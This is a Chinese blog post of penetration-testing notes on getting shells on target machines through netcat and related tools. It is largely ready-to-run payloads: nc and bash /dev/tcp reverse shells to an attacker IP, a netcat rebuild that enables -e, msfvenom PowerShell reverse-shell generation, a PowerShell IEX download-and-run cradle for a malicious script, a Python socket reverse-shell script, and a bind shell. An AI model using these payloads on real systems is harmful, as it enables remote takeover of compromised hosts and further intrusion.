NC获取系统权限

最新推荐文章于 2023-03-28 16:32:28 发布
最新推荐文章于 2023-03-28 16:32:28 发布
阅读量695 收藏
点赞数 2
分类专栏: 笔记 一些小东西 # 渗透 文章标签: nc shell获取
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45735611/article/details/115390144
版权
笔记 同时被 3 个专栏收录
32 篇文章 1 订阅
订阅专栏
渗透
23 篇文章 2 订阅
订阅专栏
一些小东西
16 篇文章 1 订阅
订阅专栏

Netcat


利用nc工具可以使命令注入攻击变得更加六匹

命令注入思路总结

反向 reverse shell

反向shell是从目标主机发起到处于监听状态的攻击机器的shell连接方式,又叫被动连接
在这里插入图片描述

Linux反弹shell

nc实现shell反弹

step1-攻击机开始监听本地端口

 nc -lvp 4444

在这里插入图片描述

step2-目标机向攻击机的端口提供shell,实现权限转移

nc 192.168.43.175 4444 -e /bin/bash

step3-当在攻击端看到收到连接后就说明已经得到了目标机器的部分shell了,可以直接敲命令了

在这里插入图片描述

在这里插入图片描述

但是被攻击者需要使用Netcat命令, 而且普通 GNU Linux nc 并没有 -e 参数; 顾此种反向nc并不适用普通linux
在这里插入图片描述

使用Bash 来代替Nc实现反向连接

step1-攻击机开始监听本地端口

 nc -lvp 4444

在这里插入图片描述

step2-目标机向攻击机的端口提供shell,实现权限转移

bash -i>& /dev/tcp/172.16.141.1/4444 0>&1

在这里插入图片描述

step3-当在攻击端看到收到连接后就会直接看到新的shell信息,不像nc连接到的时候啥也没有,,,,
在这里插入图片描述

重编译NC

Linux自带的或通过apt-get、yum安装的nc不带-e选项,可以通过重新编译的手段令其可以使用-e -c参数
前提是linux有make工具。

wget https://jaist.dl.sourceforge.net/project/netcat/netcat/0.7.1/netcat-0.7.1.tar.gz && tar zxvf netcat-0.7.1.tar.gz  && cd netcat-0.7.1  && ./configure  --enable-DGAPING_SECURITY_HOLE  && make  && make install

Windows反弹shell

MSF生成Powershell代码

比较方便,不过缺点也很明显,需要输入的字符太多了
首先在终端搜索win的反弹paylaod,找到cmd/windows/reverse_powershell

msfvenom -l payloads | grep cmd/windows/reverse

在这里插入图片描述
使用msf攻击载荷生成器得到powershell的命令

msfvenom -p cmd/windows/reverse_powershell LHOST=x.x.x.x LPORT=xxx

在这里插入图片描述
利用命令注入漏洞获取反弹shell
在这里插入图片描述

利用nc

对于没有nc工具的机器可以通过下载nc可执行文件来完成攻击
利用powershell 来下载文件
下载地址:https://eternallybored.org/misc/netcat/netcat-win32-1.11.zip

下载脚本

除了直接输入命令之外,还有一种方式就是通过命令让目标服务器下载一个恶意的脚本,然后再运行它来达到目的。
首先需要开启攻击机的web服务,然后将恶意脚本放到www目录,再利用win的powershell命令来下载脚本。

IEX (New-Object Net.WebClient).DownloadString(‘http://攻击机web服务ip/恶意脚本文件的地址’);

亦或是通过其他ftp nc等等可以传输文件内容的手段。
除去自己写一个脚本来让服务器运行之外,也有一些已经写好的脚本工具可以使用

powercat

下载地址:https://github.com/besimorhino/powercat
由于PowerCat是NetCat的PowerShell形式,所以,PowerCat可以无缝的和Netcat连接。PowerCat的用法和Netcat几乎一模一样。

Nishang

下载地址:https://github.com/samratashok/nishang
Nishang是一个基于PowerShell的攻击框架,集合了一些PowerShell攻击脚本和有效载荷,可反弹TCP/ UDP/ HTTP/HTTPS/ ICMP等类型shell

python 脚本
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("172.16.141.1",4444))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1) 
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])

对于www用户,在很多情况下是没有写入权限的,但是我们可以去寻找那些可以写的文件夹,比如/tmp,然后再将文件上传到这个文件中。

上传文件
在这里插入图片描述
运行python脚本
在这里插入图片描述
反弹成功
在这里插入图片描述

正向bind shell

正向bind shell是攻击主机通过特定的端口进行侦听目标主机即将到来的连接。
在这里插入图片描述

nc实现

step1-目标机器开启本地端口提供shell

nc -vlp 4444 -e /bin/bash

在这里插入图片描述

step2-攻击机开始监听目标端口(目标机ip)

 nc 192.168.43.15 4444

在这里插入图片描述

cc啊昂昂
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Kali学习 | 权限提升:5.4 社工SET_传递攻击载荷
qq_43233085的博客
01-15 445
Kali学习 | 权限提升:5.4 社工SET_传递攻击载荷攻击载荷 Payload操作步骤 攻击载荷 Payload 攻击载荷(Payload)指的是用户期望目标系统在被渗透攻击之后执行的代码。 在Metasploit框架中可以自由地选择、传送和植入。 例如,反弹式Shell是一种从目标主机到攻击主机创建网络连接,并提供命令行Shell的攻击载荷,而Bind Shell攻击载荷则在目标系统上将命...
yonyou NC用户权限设计6.x版本
07-27
权限设计
kali linux权限维持,权限维持篇-NC后门
weixin_39829236的博客
04-29 436
今天一直在总结msf的命令,看到TRY大佬的NC后门,感觉不错,特来复现一下。前提拿到一个shell,并且还需要提权,以高权限进行后门利用,否则会失败。因为整个过程,需要操控注册表来完成。低权限的失败案例:后门安置上传NCKali中带有Windows下的NC。upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32解释一下为什么...
NC反弹CMDSHELL提权总结
weixin_34404393的博客
03-15 554
Server-U等都不可以用的情况下.   一般都可思考用此方法不过这种方法, 只要对方装了防火墙, 或是屏蔽掉了除常用的那几个端口外的所有端口…   那么这种方法也失效了…. 1:通过shell将上传NC和CMD传到站点目录下(这里一定上传的注意权限,最好是可读写目录下)web目录都是有写有读的权限,我们直接传NC进去   2:然后本地执行nc -vv -lp 52进行反弹   ...
NC系统操作手册V30共70页.pdf.zip
11-13
3. **用户管理**:NC系统中通常有强大的用户管理和权限控制功能。手册会解释如何创建用户账户、分配角色和权限,以实现安全的访问控制,确保数据安全。 4. **模块功能**: - **财务管理**:NC系统可能提供账单处理...
NC63培训手册-权限管理
05-27
NC63的权限管理系统不仅提供了基础的RBAC功能,还可能包括其他高级特性,如权限继承、权限审计、权限动态调整等。权限继承使得角色组的权限可以自动传递给其包含的角色;权限审计能追踪并记录权限的分配和变更,以...
NC65开发环境搭建
12-11
3. **获取访问权限**:确保你有NetSuite账户,并且拥有足够的权限来创建和修改脚本、记录和工作流。 4. **设置开发套件**:根据文档指导,下载并安装UAPServer,这是运行和测试自定义代码的必要组件。 5. **处理...
NC65数据字典
01-30
4. 安全性与权限NC6.5的数据字典还可能涉及权限和角色的信息,说明哪些用户或用户组可以访问特定的表格和字段,有助于实现数据安全和访问控制。 5. 自定义与扩展:对于开发者来说,数据字典是自定义和扩展NC功能...
NC575】用友会员管理系统解决方案.pdf
06-07
总的来说,【NC575】用友会员管理系统解决方案提供了全面的会员管理工具,涵盖了会员生命周期中的各个阶段,帮助企业构建有效的会员激励机制,提升客户满意度和忠诚度,进而提高企业的市场竞争力。通过这个系统,...
NC】为角色分配按钮权限
u010741112的博客
10-31 948
进入“权限管理”,找到目标角色,例如“会计”角色属于“业务类角色”,双击进去,看是否能查询到。在“功能注册”节点中找到相应节点名称对应的按钮,即“会计按钮”,点击“修改”。案例:为“会计”角色在“项目利息计算”节点分配“修改”按钮的权限。在“权限管理”-“职责”中,找到对应的“职责名称”,双击进入。进入“业务类角色”后,可以查询到“会计”角色,双击进入。查看“已分配职责”中的“职责名称”。
linux-运维进阶-21 Squid部署代理缓存服务
weixin_42560249的博客
03-26 541
linux-运维进阶-21 Squid部署代理缓存服务 概念解析 Squid Squid是一个高性能的代理缓存服务器,Squid支持FTP、gopher、HTTPS和HTTP协议。和一般的代理缓存软件不同,Squid用一个单独的、非模块化的、I/O驱动的进程来处理所有的客户端请求。 Squid是一种用来缓冲Internet数据的软件。它是这样实现其功能的,接受来自人们需要下载的目标(object)...
NC65 特殊数据权限里的主管权限有什么用?如何在特殊数据权限节点添新的权限资源?
最新发布
u010741112的博客
03-28 319
勾选了这个标记,说明该单据启用了主管权限。组织的主管对组织内人员制单的单据,有全部操作权限。例如,部门经理能查看、维护、审批其下级创建的单据或档案。通常主管权限需要跟创建者权限结合使用。1、NCNCC特殊数据权限里的主管权限有什么用?2、如何在【特殊数据权限】节点添新的权限资源?
Linux中的nc测试端口是否开放
weixin_30307267的博客
08-09 1156
nc测试端口是否开放 在Linux中有一个级强大的网络工具netcat,在默认情况下面都是没有安装的,现在介绍一下安装过程其实安装很简单 一、安装使用 1、只需输入命令yum安装: [root@SZB-L0032015 ~]# yum install -y nc [root@SZB-L0032015 ~]# yum install -y nc Loaded plugins...
用友NC63界面新增按钮实现方法
凌霄之志
03-24 1万+
NC开发最基本的添按钮并实现按钮事件业务逻辑处理,下面写一个例子介绍该过程的实现方法。 拿物流执行模块作为例子,在计量单维护界面增两个按钮“A杆”“B杆”,单击这两个按钮,分别控制A和B道闸栏杆起降。 第一步:              找到该页面的配置文件。打开“应用管理平台”--“开发配置工具”--“功能注册”节点,找到页面,查看参数注册,查看配置文件 第二步:   
linux下nc命令参数及用法详解--功能超级强大的网络工具netcat
xiaopang758的专栏
07-27 1551
功能说明:功能强大的网络工具 语  法:nc [-hlnruz][-g][-G][-i][-o][-p][-s][-v...][-w][主机名称][通信端口...] 参  数:   -G   设置来源路由指向器,其数值为4的倍数。   -i   设置时间间隔,以便传送信息及扫描通信端口。   -n   直接使用IP地址,而不通过域名服务器。   -p   设置本地主机使用的通信端口。
nc命令用法举例
mtj66的博客,交流WX:SpringBreeze1104
07-11 5495
什么是nc nc是netcat的简写,有着网络界的瑞士军刀美誉。因为它短小精悍、功能实用,被设计为一个简单、可靠的网络工具 nc的作用 (1)实现任意TCP/UDP端口的侦听,nc可以作为server以TCP或UDP方式侦听指定端口 (2)端口的扫描,nc可以作为client发起TCP或UDP连接 (3)机器之间传输文件 (4)机器之间网络测速                    
NC工具的使用说明教程
热门推荐
xysoul的专栏
08-21 8万+
nc的使用方法 netcat被誉为网络安全界的‘瑞士军刀’,相信没有什么人不认识它吧...... 一个简单而有用的工具,透过使用TCP或UDP协议的网络连接去读写数据。它被设计成一个稳定的后门工具,能够直接由其它程序和脚本轻松驱动。同时,它也是一个功能强大的网络调试和探测工具,能够建立你需要的几乎所有类型的网络连接,还有几个很有意思的内置功能(详情请看下面的使用方法)。  在中国,它
黑客实战之攻击篇——用NC打造成自己的简单后门
cexosoft的专栏
01-30 9132
大家都知道nc是一个强大并且灵活的黑客工具,用他可以做很多事情,譬如做为telnet的客户端口,譬如入侵的时候反弹回来shell,譬如扫描……但是你有没有想过将他打造成一个服务级的后门呢?现在好多跟我一样的菜鸟还不懂得编程,别人写的流行点的后门又经常被杀,那就跟我一起来自己手工制作一个后门吧,不需要任何编程知识菜鸟级的东东哦。   首先请准备好不被杀的nc.exe(随便个壳就可以了的),还有sc
用友NC财务报表系统操作步骤.doc
12-02
- 使用过程中遇到问题,用户可能需要联系技术支持或查阅系统提供的帮助文档以获取解决方案。 通过以上步骤,企业员工能够有效地使用用友NC财务报表系统,完成日常的财务报表编制和分析任务,从而提升财务管理效率...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值